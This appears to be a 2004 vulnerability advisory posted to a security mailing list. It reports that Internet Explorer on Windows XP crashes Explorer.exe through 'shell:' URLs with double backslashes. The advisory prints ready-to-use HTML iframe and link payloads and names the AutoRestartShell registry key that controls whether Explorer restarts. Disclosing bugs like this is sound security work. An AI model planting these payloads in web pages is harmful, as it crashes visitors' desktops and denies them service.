<<< Date Index >>>     <<< Thread Index >>>

Internet Explorer Causing Explorer.exe - Null Pointer Crash



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:     Internet Explorer & Explorer.exe
Vendors:           http://www.microsoft.com
Versions:          Windows Xp Professional & Internet Explorer
6.0.2600.0000.xpclnt_qfe.021108-2107
Patched With:  Q330994; Q822925; Q828750; Q824145;
Platforms:         WindowsXp
Bug:                   Internet Explorer Causing Explorer.exe - Null Pointer
Crash
Risk:                  Medium -  D.O.S
Exploitation:     Remote with browser
Date:                  19 Mar 2004
Author:             Rafel Ivgi, The-Insider
e-mail:                the_insider@xxxxxxxx
web:                   http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WindowsXp is currently the most common operating system in the world.
This product must be as safe as it is common.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Lately a new function was discovered : "shell:". This function allows
running some
new functions remotley. There is a bug in Explorer.exe when accessing a
filename
with double backslash.

For Example accessing any of the html tags below, will cause explorer to
crash.
<iframe src=shell:windows\\system32\\calc.exe></iframe>
Or
<a href=shell:windows\\system32\\calc.exe></a>
Or
Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

Explorer.exe crashes when using "\\".
"\" doesn't crash it and even %5C%5C doesn't crash it.

There is a registery key which is turned on by default. This key
automatically restarts
"Explorer.exe". If this key is set to "0", Explorer.exe will not restart.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoRestartShell"=dword:00000001

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

<iframe src=shell:windows\\system32\\calc.exe></iframe>
Or
<a href=shell:windows\\system32\\calc.exe></a>
Or
Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."